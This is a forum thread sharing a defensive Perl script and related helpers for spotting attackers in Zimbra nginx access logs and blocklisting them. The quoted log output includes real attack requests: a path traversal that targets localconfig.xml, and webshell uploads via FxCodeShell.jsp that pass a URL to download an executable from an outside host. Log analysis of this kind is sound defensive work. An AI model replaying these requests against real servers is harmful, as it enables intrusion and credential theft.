Script to investigate nginx.access.log and attackers

JDunphy
Outstanding Member
Posts: 484
Joined: Fri Sep 12, 2014 11:18 pm
Location: Victoria, BC
ZCS/ZD Version: 8.7.11_P14 RHEL6 Network Edition

Script to investigate nginx.access.log and attackers

Postby JDunphy » Tue Apr 30, 2019 11:57 pm

I would like to share a tool I have been using to investigate attacks against our zimbra servers with the recent RCE/SSRFs. Without arguments it will look at all your /opt/zimbra/nginx.access.logs* and display what it thinks are attacks on your server. To get the most out of it, you should look for the STEP 1 section in the code. By default, with no arguments, it attempts to identify your zimbra user stream and everything else would be 'attackers' to it. Adding 1 or 2 specific things could allow you to isolate your normal zimbra users from everything else. It has built-in help. For those with TL;DR, try these commands:

Code:

% check_attacks.pl --srcip '188.191.164.43|47.244.18.107|85.27.246.48|47.75.249.121|95.179.215.180|18.18.248.17|112.118.155.15|47.75.173.76|159.69.81.117|212.51.217.211|112.118.155.15'
% check_attacks.pl --pstatus=400
% check_attacks.pl | grep -A2 -i autodiscover
% check_attacks.pl --search autodiscover

It's a small perl program and can be found here: https://github.com/JimDunphy/ZimbraScripts/blob/master/src/check_attacks.pl

Code:

% wget https://raw.githubusercontent.com/JimDunphy/ZimbraScripts/master/src/check_attacks.pl
% chmod 755 check_attacks.pl
% ./check_attacks.pl

For others, an explanation of some of the ways I have been using this.

Code:

% check_attacks.pl -h

usage: % check_attacker.pl
        [--fcolor=<color name (i.e. RED)>]
        [--srcip=<ip address>]
        [--localUser ]
        [--IPlist ]
   [--statuscnt]
   [--display="date|upstream|bytes|port|referrer]
   [--usertype=<attacker|local|all>
   [--pstatus=<regex of status codes>
        [--help]
        [--version]
    where:
        --srcip|sr: print only records matching ip addresses
   --statuscnt: prints out the count for each status return code found
        --help|h: this message
examples:  (-- or - or first few characters of option so not ambigous)
         % check_attacker.pl -srcip 10.10.10.1      #only this ip address
         % check_attacker.pl -srcip  '10.10.10.1|20.20.20.2'      #only these ip addresses
         % check_attacker.pl -statuscnt  #print status codes
         % check_attacker.pl --statuscnt  #print status codes  #same
         % check_attacker.pl --localUser #include local users accounts
         % check_attacker.pl --IPlist   # print list of ips
         % check_attacker.pl --IPlist --ipset  # print list of ips in ipset format
         % check_attacker.pl --IPlist -pstatus='40.' --ipset  # print list of ips in ipset format with status code 400..409
         % check_attacker.pl --localUser --IPlist   # print list of local ips used by local users
         % check_attacker.pl --IPlist --ipset  | sh # install ip's into ipset
         % check_attacker.pl --initIPset  # show how to create ipset
         % check_attacker.pl -fc RED  #change color
         % check_attacker.pl --usertype=local  # print out strings of only local users
         % check_attacker.pl --pstatus='4..'  # print out only those requests with a code of 4XX (ie 403, 404, 499)
         % check_attacker.pl --usertype=all --pstatus='403|500'  # print out only those requests with a code of 403 or 500 for all types (local & attacker)
         % check_attacker.pl --display=date      # default is to display the user agent
         % check_attacker.pl --display=referrer  # default is to display the user agent

To give some examples (type enough characters so the program knows the option, i.e. --sta works for --statuscnt)... following along:

Code:

% check_attacker.pl --status
Codes 200 Total: 67
Codes 302 Total: 1
Codes 400 Total: 58
Codes 404 Total: 23
Codes 501 Total: 1

Status code 400 is a hard error... let's investigate:

Code:

% check_attacker.pl --pstatus='400'
   [ 400] |\x005\x00|\x00z\x00W\x00\xB0\x00|\x00|\x00\xEB\x00\xEA\x005\x00\xB0\x00\xE9\x00\xEB\x00V\x00W\x00V\x00!\x00\x06\x00Y\x00V\x00Y\x00\xB0\x00\xE9\x00\xE9\x00\x06\x00Y\x00W\x00\xEA\x00Y\x00|\x00\xE9\x00(\x005\x00\xA5\x00W\x00V\x00\xEB\x00\xEB\x005\x00!\x00{\x00{\x00{\x005\x00\xEA\x00\xA5\x00|\x00!\x00!\x00\xA5\x00V\x00W\x005\x00\xCC\x00(\x00W\x00\x06\x00\xEB\x00(\x00{\x00Y\x005\x00\x06\x00\xEA\x00(\x00\xCC\x00\xA5\x00\xA5\x00\xB0\x00{\x00\xB0\x00\xE9\x00\xE9\x00\xA5\x00\xE9\x00\xE9\x00!\x00\xA5\x00\xCC\x00Y\x00\xA5\x00\xB0\x00Y\x00(\x00\xEA\x00{\x00\x06\x00\xA5\x00\xA5\x00\x06\x00\xB0\x00{\x00W\x00\xEA\x00\x06\x00Y\x00z\x00\xEA\x00W\x00Y\x00\xEB\x00{\x00\xCC\x00|\x00\xB0\x00\xE9\x00|\x00(\x00(\x00\xEA\x00V\x00\xB0\x00!\x00\xB0\x00\x06\x00\xB0\x00z\x00\xA5\x00!\x00W\x00\xEA\x00V\x00z\x00\xEA\x00z\x00\x06\x00\xCC\x00\xCC\x00|\x005\x00(\x00\x06\x00z\x00{\x00|\x00z\x005\x00\xEB\x00|\x00!\x00\xE9\x005\x00{\x00|\x00V\x00z\x00\xCC\x00{\x00(\x00\xEB\x00Y\x00\xE9\x00z\x00|\x00!\x00\xCC\x00V\x00\xB0\x00V\x00\x06\x00\xEA\x00z\x00\xE9\x00{\x00\xEB\x00!\x00\xEA\x00\xEB\x00\x06\x00\xEA\x00|\x00Y\x00|\x005\x00z\x00Y\x00Y\x00V\x00V\x005\x00!\x00z\x00W\x00\xCC\x00W\x00!\x00|\x00V\x00\xCC\x00\xEA\x00\xB0\x00\x06\x00{\x00\xEA\x00\xCC\x005\x00\xCC\x00(\x00{\x00z\x00V\x00\x06\x00\xE9\x00\xEA\x00\xEA\x00\xEA\x00!\x00|\x00\x06\x00W\x00(\x00\xA5\x00z\x00\x06\x00W\x00V\x00\xEA\x00\x06\x00\xEB\x00!\x00\xA5\x00Y\x005\x00{\x00!\x00V\x00\xE9\x00\xCC\x005\x00\xEB\x00z\x00\xB0\x00\xEB\x00\x06\x00V\x00\xB0\x00\xA5\x00!\x00(\x00Y\x00(\x00(\x00V\x00z\x00\xB0\x00\xEB\x00\xEB\x00\xCC\x00!\x00\xCC\x00\xCC\x00\xCC\x00\xE9\x00(\x00|\x005\x00\xEB\x00\xEA\x005\x00\xEB\x00\xE9\x00\xA5\x00(\x00W\x00Y\x00Y\x00\xCC\x00|\x00Y\x00W\x00|\x00|\x00\xEB\x005\x00Y\x00\xE9\x00\xEA\x00\xA5\x00\x06\x00Y\x00{\x00\xEA\x00\xA5\x00\xE9\x00\xB0\x00!\x00\xEB\x00W\x00\xA5\x00z\x00\xA5\x00\xEB\x00\xA5\x00!\x00z\x00\xCC\x00\xB0\x00\xEB\x00V\x00\xCC\x00\xEA\x00\xCC\x00{\x00V\x00!\x00\x06\x00Y\x00\xEA\x00\xB0\x00\xB0\x00V\x
00\xE9\x00\xEB\x00\xEA\x00V\x005\x00\xB0\x00W\x00\xEA\x00Y\x00(\x00\xCC\x00z\x00!\x00z\x00\x06\x005\x00\x06\x00z\x00\x06\x00\xEB\x00\xCA\x00 bot
   [ 400] \x09\x00\xB0\x00\xF3\x00\xD9\x00\x8E\x00\x09\x00\xA7\x00\xEC\x00\x8B\x00\xD9\x00\xF3\x00\x8E\x00\xD9\x00\xB0\x00z\x00\xB0\x00\xC5\x00\xFC\x00\xA7\x00z\x00\x09\x00\x17\x00\xC5\x00\xEC\x00H\x00\xFE\x00\xFE\x00j\x00\xFE\x00\x8E\x00\xC5\x00\xC5\x00\xFE\x00z\x00\xEC\x00\xA7\x00z\x00\xC5\x00\xF3\x00H\x00\xD9\x00\xA7\x00\xEC\x00\xD9\x00\x8B\x00\xFE\x00H\x00z\x00\xFB\x00H\x00\xFB\x00\x17\x00\xB0\x00\xF3\x00\xFC\x00\xFC\x00\x09\x00j\x00\x17\x00\xFB\x00\xFC\x00\x8E\x00\xEC\x00\xFB\x00\xF3\x00\xB0\x00\x8E\x00\x17\x00\x17\x00\xFC\x00\xC5\x00H\x00\xA7\x00\xFE\x00\xC5\x00\xF3\x00\xC5\x00\xA7\x00\xB0\x00\xFC\x00\xD9\x00\xFC\x00\xB0\x00\xFE\x00H\x00j\x00\xC5\x00\x17\x00z\x00\x17\x00\xFC\x00\xA7\x00\xD9\x00\xF3\x00\xEC\x00\xFE\x00\xA7\x00\xA7\x00\xFB\x00\xB0\x00\x8E\x00\xC5\x00\xB0\x00H\x00\x17\x00\xC5\x00\x8B\x00j\x00\x8E\x00\xEC\x00\xF3\x00\xFE\x00\xD9\x00\xF3\x00\xA7\x00j\x00\xEC\x00\xA7\x00\xB0\x00\x17\x00\xFC\x00H\x00H\x00\x09\x00\x09\x00\x09\x00H\x00\x8E\x00\xCE\x00 bot
 Attacker from  108.178.16.154                  2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  python-requests/2.21.0
 Attacker from  112.118.155.15                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] HEAD /  bot
   [ 400] HEAD /  bot
 Attacker from  138.246.253.5                   3 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] )S\xC3b=\xE0)\x1Bp\x91K\xED\x88\x8FY\xC2 bot
 Attacker from  155.94.222.12                   1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17
 Attacker from  159.69.81.117                   2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] GET /  Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
   [ 400] GET /  Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
 Attacker from  164.52.24.162                   2 Requests - Score 25%

Note the Score of 25%. Most times this might be considered a door knocker but here we have someone attempting to perform a bad request. If you want to replace the user agent with the time try this:

Code:

% check_attacks.pl --pstatus='400' --srcip='164.52.24.162' --display=date
   [ 400] GET /  30/Apr/2019:13:28:02
   [ 400] GET /  24/Apr/2019:05:15:56
 Attacker from  164.52.24.162                   2 Requests - Score 25%
------------------------------------------------------------------------------------------------------------

If you are satisfied, then you can do this to get a list of attacking IPs. ("using tail -5 to keep output short for this post")

Code:

% check_attacks.pl --iplist | head -5
107.170.202.34
107.170.204.68
108.178.16.154
112.118.155.15
112.64.199.58

If you use ipsets, do this:

Code:

% check_attacks.pl --iplist --ipset | head -5
ipset add blacklist24hr 107.170.202.34 -exists
ipset add blacklist24hr 107.170.204.68 -exists
ipset add blacklist24hr 108.178.16.154 -exists
ipset add blacklist24hr 112.118.155.15 -exists
ipset add blacklist24hr 112.64.199.58 -exists

If you only want certain types of status codes to be listed, try this:

Code:

% check_attacks.pl --iplist --pstatus='400|501' |head -5
108.178.16.154
112.118.155.15
138.246.253.5
155.94.222.12
159.69.81.117
% check_attacks.pl --iplist --ipset --pstatus='400' |head -5
ipset add blacklist24hr 108.178.16.154 -exists
ipset add blacklist24hr 112.118.155.15 -exists
ipset add blacklist24hr 138.246.253.5 -exists
ipset add blacklist24hr 155.94.222.12 -exists
ipset add blacklist24hr 159.69.81.117 -exists

The default case is like this:

Code:

% check_attackers.pl
   [ 200] GET /  bot
 Attacker from  178.73.215.171                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  python-requests/2.21.0
   [ 400] GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00  python-requests/2.21.0
 Attacker from  18.18.248.17                    2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  bot
 Attacker from  184.105.139.69                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  bot
 Attacker from  184.105.247.194                 1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  bot
   [ 200] GET /  bot
 Attacker from  184.105.247.196                 2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 200] GET /robots.txt  bot
   [ 404] GET /sitemap.xml  bot
   [ 404] GET /.well-known/security.txt  bot
   [ 400] stealth request - exploit attemped bot
 Attacker from  185.142.236.34                  9 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 200] GET /robots.txt  bot
   [ 404] GET /sitemap.xml  bot
   [ 404] GET /.well-known/security.txt  bot
   [ 400] stealth request - exploit attemped bot
 Attacker from  185.142.236.35                  9 Requests - Score 100%
...
...

Now the oddities... It tries to understand what your zimbra user stream is. That is the STEP 1 section you probably need to customize to get the best behavior. That also means that if you have a 501 status code and investigate it with the print status command --pstatus='501', it might not display anything if it considered that record to be a zimbra or "local user" request. This means you might need to specify that you also want the "local" users' requests. This is the purpose of the --usertype option, and it can be attacker, local, or all. The default --usertype is attacker, so you don't need to specify that for most investigations.

It has been enlightening to learn how zimbra is behaving from nginx's eyes. If you are having problems with customizing STEP 1, I don't need the full logs... use the program to generate a few lines. I would like to incorporate those additions into the code so future users may not have to perform any customization and the program completely understands zimbra user session streams.

Code:

% check_attacks.pl --srcip=X.X.X.X | head -50

In my experience, just 1 or perhaps 2 tweaks will let the script understand your zimbra traffic so none of it shows up in the default attacker display. I have only run this on 8.7.11+ but it should parse nginx.access.logs for newer versions of Zimbra.

Enjoy.

Jim
Last edited by JDunphy on Fri May 03, 2019 3:49 pm, edited 3 times in total.
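Added example for the post above; this is editor-written Python, not check_attacks.pl or any code from JDunphy. It shows the mechanics the post describes: parse access log lines, separate the "local user" stream from everything else, filter by a status-code regex and a source-IP regex the way --pstatus and --srcip do, score each source IP, and emit the --iplist / --ipset output. Assumptions: the lines are in nginx's standard "combined" log_format (Zimbra's proxy log_format carries extra fields, so LOG_RE must be extended for a real nginx.access.log), LOCAL_PATHS stands in for the script's STEP 1 rules, and score() is this example's own heuristic, chosen so that a bad request from a browser-like user agent lands at the 25% shown in the post; the function names and the sample log lines are constructed.

```python
import re
from collections import defaultdict

# Assumed log layout: nginx "combined" log_format. Zimbra's proxy log_format carries
# extra fields (upstream, port, ...); extend LOG_RE to match a site's own format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<date>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referrer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Stand-in for the script's STEP 1 rules (assumption): a normal Zimbra client
# session is a successful request to one of these paths.
LOCAL_PATHS = ("/service/soap", "/zimbra/", "/service/home/")

# Constructed sample lines; not taken from the post's logs.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Apr/2019:13:28:02 -0700] "GET / HTTP/1.1" 400 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
203.0.113.10 - - [24/Apr/2019:05:15:56 -0700] "GET / HTTP/1.1" 400 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
198.51.100.7 - - [29/Apr/2019:00:24:56 -0700] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 0 "-" "python-requests/2.21.0"
198.51.100.7 - - [29/Apr/2019:00:25:01 -0700] "HEAD / HTTP/1.1" 400 0 "-" "python-requests/2.21.0"
192.0.2.44 - user@example.com [30/Apr/2019:09:00:01 -0700] "POST /service/soap/NoOpRequest HTTP/1.1" 200 512 "https://mail.example.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/66.0"
192.0.2.44 - user@example.com [30/Apr/2019:09:00:05 -0700] "GET /zimbra/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/66.0"
this line is not in the expected format and is skipped
"""


def parse(lines):
    """Yield one record per line that matches LOG_RE; unparseable lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def request_path(rec):
    """'GET /zimbra/ HTTP/1.1' -> '/zimbra/'; malformed requests come back whole."""
    parts = rec["request"].split()
    return parts[1] if len(parts) >= 2 else rec["request"]


def is_local_user(rec):
    """Heuristic for the Zimbra user stream (the part a site tunes in STEP 1)."""
    return rec["status"].startswith("2") and request_path(rec).startswith(LOCAL_PATHS)


def score(recs):
    """Example heuristic, not the script's own scoring: a non-browser user agent
    counts fully, a browser user agent with a 4xx/5xx counts a quarter, so a
    bad request from a real-looking browser lands at 25% like the post shows."""
    pts = 0.0
    for r in recs:
        if not r["ua"].startswith("Mozilla/"):
            pts += 1.0
        elif r["status"][0] in "45":
            pts += 0.25
    return round(100 * pts / len(recs)) if recs else 0


def attackers(lines, pstatus=r".*", srcip=r".*", usertype="attacker"):
    """Records grouped per source IP. pstatus and srcip are regexes, as with
    --pstatus and --srcip; usertype is attacker (default), local or all."""
    status_rx, ip_rx = re.compile(pstatus), re.compile(srcip)
    groups = defaultdict(list)
    for rec in parse(lines):
        local = is_local_user(rec)
        if (usertype == "attacker" and local) or (usertype == "local" and not local):
            continue
        if status_rx.fullmatch(rec["status"]) and ip_rx.search(rec["ip"]):
            groups[rec["ip"]].append(rec)
    return dict(groups)


def iplist(groups, ipset=None):
    """IPs in numeric order; with ipset= the 'ipset add ... -exists' commands."""
    ips = sorted(groups, key=lambda ip: tuple(int(o) for o in ip.split(".")))
    return [f"ipset add {ipset} {ip} -exists" if ipset else ip for ip in ips]


def report(groups, display="ua"):
    """Text in the shape of the script's default output; display picks the
    trailing field (ua, date, referrer or bytes)."""
    out = []
    for ip in iplist(groups):
        recs = groups[ip]
        for r in recs:
            method_path = " ".join(r["request"].split()[:2])
            out.append(f"   [ {r['status']}] {method_path}  {r[display]}")
        out.append(f" Attacker from  {ip:<32}{len(recs)} Requests - Score {score(recs)}%")
        out.append("-" * 60)
    return "\n".join(out)


if __name__ == "__main__":
    hard_errors = attackers(SAMPLE_LOG.splitlines(), pstatus="400")
    print(report(hard_errors, display="date"))
    print("\n".join(iplist(hard_errors, ipset="blacklist24hr")))
```

The status filter uses fullmatch, so '4..' and '403|500' behave as in the post's examples, while the IP filter uses search so a partial address or an alternation of addresses both work. Before feeding the ipset lines to sh, check the "local" view too (usertype="local"): anything that belongs to your own users but is missing from LOCAL_PATHS will otherwise show up as an attacker.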



Re: Script to investigate nginx.access.log and attackers

Postby JDunphy » Wed May 01, 2019 5:55 pm

I am investigating various reputation lists to further my understanding of current attacks on our zimbra mailboxd services... Eventually, all this will be part of a feedback loop with modsecurity 3 and used in the scoring and identification of the type of bot with check_attacks.pl. Quick and dirty bash script included below to experiment with various reputation services. This scoring might be used in the future to help determine if countermeasures like a captcha are displayed or even tarpitting for https access and hopefully reduce the more common bot attack exposure, etc. Still very fluid about what the end goal might be... I am not a fan of long-lived blacklists but the current attacks appear to be initiated from the same set of IPs, at least on our servers. If anyone knows any good realtime databases of IP addresses participating in active attacks, please let me know. Thanks.

Code:

% cat blcheck
#!/bin/bash

# usage: blcheck 1.1.1.2
#        check_attacker.pl --pstatus=400 --iplist | blcheck
#        cat list-of-ips | blcheck

BLISTS="
    cbl.abuseat.org
    dnsbl.sorbs.net
    bl.spamcop.net
    zen.spamhaus.org
"

# register at http://www.projecthoneypot.org/httpbl_api.php
# to obtain an API-key (free)
#add this to the BLISTS -  dnsbl.httpbl.org
#HTTPbl_API_KEY="your_api_key"

function lookupIP {

ip=$1

if [ -z "${ip}" ];then return;fi

# only dotted-quad IPv4 addresses can be reversed into a DNSBL name; skip anything else
if ! [[ "${ip}" =~ ^[0-9]{1,3}(\.[0-9]{1,3}){3}$ ]]; then
    echo "skipping '${ip}': not an IPv4 address" >&2
    return
fi

# 1.2.3.4 becomes 4.3.2.1 (DNSBLs are keyed on the reversed address)
reverse=$(echo "$ip" | awk -F\. '{printf "%s.%s.%s.%s",$4,$3,$2,$1}')

# -- cycle through all the blacklists
for BL in ${BLISTS}
do
    # dig to lookup the name in the blacklist: an A record means listed, NXDOMAIN means not listed
    printf "%-50s" " ${reverse}.${BL}."
    if [ "$BL" == "dnsbl.httpbl.org" ];
    then
      # http:BL wants the API key in front of the reversed address
      if [ -z "${HTTPbl_API_KEY}" ]; then echo "no-api-key"; continue; fi
      HIT="$(dig +short -t a "${HTTPbl_API_KEY}.${reverse}.${BL}.")"
    else
      #echo dig +short -t a ${reverse}.${BL}.
      HIT="$(dig +short -t a "${reverse}.${BL}.")"
    fi
    # unquoted on purpose: several returned addresses collapse onto one line; --- when not listed
    echo ${HIT:----}
done
}

# From the command line or from stdin
{
    [ "$#" -gt 0 ] && printf '%s\n' "$@"
    [ ! -t 0 ]     && cat
} |
while IFS= read -r; do
    lookupIP "$REPLY"
done

exit;

Then usage is:

Code:

% blcheck 164.52.24.162
 162.24.52.164.dnsbl.httpbl.org.                  ---
 162.24.52.164.cbl.abuseat.org.                   127.0.0.2
 162.24.52.164.dnsbl.sorbs.net.                   ---
 162.24.52.164.bl.spamcop.net.                    ---
 162.24.52.164.zen.spamhaus.org.                  127.0.0.4
 

or directly from zimbra nginx.access.logs*

Code:

% ./check_attacks.pl --pstatus=400 --iplist | head -2 | blcheck
 5.253.246.138.dnsbl.httpbl.org.                  ---
 5.253.246.138.cbl.abuseat.org.                   127.0.0.2
 5.253.246.138.dnsbl.sorbs.net.                   ---
 5.253.246.138.bl.spamcop.net.                    ---
 5.253.246.138.zen.spamhaus.org.                  127.0.0.11 127.0.0.4
 162.24.52.164.dnsbl.httpbl.org.                  ---
 162.24.52.164.cbl.abuseat.org.                   127.0.0.2
 162.24.52.164.dnsbl.sorbs.net.                   ---
 162.24.52.164.bl.spamcop.net.                    ---
 162.24.52.164.zen.spamhaus.org.                  127.0.0.4
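Added example for the blcheck post above; editor-written Python, not JDunphy's script. It builds the same reversed-octet query names blcheck sends (including the API-key prefix for http:BL), resolves them, and then does the step the shell script leaves to the reader: decoding the returned 127.x.x.x answers. The Spamhaus ZEN codes (127.0.0.2-3 SBL, .4-.7 XBL, .10-.11 PBL, 127.255.255.x for a refused query) and the http:BL layout (127.days.threat.type) are the services' documented conventions; the resolver is injectable so the logic runs offline against the constructed FAKE_DNS table, and PLACEHOLDER_KEY and 192.0.2.99 are made up.

```python
import ipaddress
import socket

# The lists blcheck walks (from the post); http:BL is added only when a key is set.
BLISTS = ["cbl.abuseat.org", "dnsbl.sorbs.net", "bl.spamcop.net", "zen.spamhaus.org"]
HTTPBL = "dnsbl.httpbl.org"


def query_name(ip, bl, httpbl_key=None):
    """Reverse the octets and append the list: 1.2.3.4 -> 4.3.2.1.<list>.
    http:BL expects the API key in front of the reversed address."""
    addr = ipaddress.IPv4Address(ip)          # ValueError on anything that is not IPv4
    rev = ".".join(reversed(str(addr).split(".")))
    if bl == HTTPBL:
        if not httpbl_key:
            raise ValueError("dnsbl.httpbl.org lookups need an API key")
        return f"{httpbl_key}.{rev}.{bl}."
    return f"{rev}.{bl}."


def resolve_a(name):
    """Live resolver: every A record for name; [] on NXDOMAIN, which means 'not listed'."""
    try:
        return sorted({r[4][0] for r in socket.getaddrinfo(name, None, socket.AF_INET)})
    except socket.gaierror:
        return []


def decode_zen(answer):
    """Spamhaus ZEN answer codes: 127.0.0.2-3 SBL, .4-.7 XBL, .10-.11 PBL;
    127.255.255.x signals a rejected query (typically a blocked public resolver)."""
    if answer.startswith("127.255.255."):
        return "query refused"
    last = int(answer.rsplit(".", 1)[1])
    if last in (2, 3):
        return "SBL"
    if 4 <= last <= 7:
        return "XBL"
    if last in (10, 11):
        return "PBL"
    return "unknown"


def decode_httpbl(answer):
    """http:BL answers 127.<days since last seen>.<threat score>.<type bitmask>."""
    _, days, threat, kind = (int(x) for x in answer.split("."))
    names = [n for bit, n in ((1, "suspicious"), (2, "harvester"), (4, "comment spammer")) if kind & bit]
    return {"days": days, "threat": threat, "type": names or ["search engine"]}


def check(ip, resolver=resolve_a, httpbl_key=None):
    """Query every list for ip; returns {list: [answers]} ([] = not listed).
    resolver is injectable so the logic can be exercised without network access."""
    lists = BLISTS + ([HTTPBL] if httpbl_key else [])
    return {bl: resolver(query_name(ip, bl, httpbl_key)) for bl in lists}


def listed_on(result):
    """Names of the lists that returned an answer."""
    return [bl for bl, answers in result.items() if answers]


# Constructed offline stand-in for DNS, with made-up answers for 192.0.2.99.
FAKE_DNS = {
    "99.2.0.192.cbl.abuseat.org.": ["127.0.0.2"],
    "99.2.0.192.zen.spamhaus.org.": ["127.0.0.11", "127.0.0.4"],
    "PLACEHOLDER_KEY.99.2.0.192.dnsbl.httpbl.org.": ["127.3.40.6"],
}


def fake_resolver(name):
    return FAKE_DNS.get(name, [])


if __name__ == "__main__":
    ip = "192.0.2.99"
    for bl, answers in check(ip, fake_resolver, httpbl_key="PLACEHOLDER_KEY").items():
        print(f" {query_name(ip, bl, 'PLACEHOLDER_KEY'):<48} {' '.join(answers) or '---'}")
```

Two things worth having in the loop before acting on a hit: a 127.255.255.x answer from ZEN is not a listing but a refusal (queries through some public resolvers are rejected), and a PBL-only hit means "dynamic/end-user address space", which says little about the host beyond that it should not be talking SMTP directly.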

Re: Script to investigate nginx.access.log and attackers

Postby JDunphy » Thu May 02, 2019 8:46 pm

Added a search and worked on more rules for scoring. The search works across the ip space and, if any match is found, will display that ip and all the requests it has made to your server. This is intentional as we already have stdout and grep (check_attacks.pl | grep something), so I was looking for what this ip has done to the server. --search '\.jsp|\.php|python|01/May' will search user agent, request and date, and then format the requests by that ip.
Here is an example.

Code:

% check_attacks.pl --search '\.jsp|autodis' | head -10
   [ 400] PUT /FxCodeShell.jsp%20  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] PUT /FxCodeShell.jsp::$DATA  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] PUT /FxCodeShell.jsp/  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
 Attacker from  111.62.18.16                    4 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  python-requests/2.21.0
 Attacker from  112.118.155.15                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  python-requests/2.21.0
relay3:~:50> check_attacks.pl --search '\.jsp|autodis' | head -15
   [ 400] PUT /FxCodeShell.jsp%20  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] PUT /FxCodeShell.jsp::$DATA  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] PUT /FxCodeShell.jsp/  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
 Attacker from  111.62.18.16                    4 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  python-requests/2.21.0
 Attacker from  112.118.155.15                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  python-requests/2.21.0
   [ 400] POST /Autodiscover/Autodiscover.xml  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17
 Attacker from  159.69.81.117                   2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 404] GET /nx8j78af1b.jsp  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
 Attacker from  169.197.108.30                  1 Requests - Score 100%
 

If you want to see the date when this happened (notice the jsp request from 169.197.108.30), just add --display=date and it will swap that in place of the user agent field.

Code:

% check_attacks.pl --search '\.jsp|autodis' --display=date | head -15
   [ 400] PUT /FxCodeShell.jsp%20  26/Apr/2019:06:04:07
   [ 400] PUT /FxCodeShell.jsp::$DATA  26/Apr/2019:06:04:08
   [ 400] PUT /FxCodeShell.jsp/  26/Apr/2019:06:04:08
   [ 400] GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe  26/Apr/2019:06:04:09
 Attacker from  111.62.18.16                    4 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  29/Apr/2019:00:24:56
 Attacker from  112.118.155.15                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  28/Apr/2019:02:00:09
   [ 400] POST /Autodiscover/Autodiscover.xml  28/Apr/2019:02:00:09
 Attacker from  159.69.81.117                   2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 404] GET /nx8j78af1b.jsp  02/May/2019:06:20:50
 Attacker from  169.197.108.30                  1 Requests - Score 100%

Some things are just beginning to hit me... You want to know if something larger than a /32 is hitting you... Use --srcip with only 3 octets:

Code:

% check_attacks.pl --srcip 93.119.227
   [ 200] GET /  Wget/1.13.4 (linux-gnu)
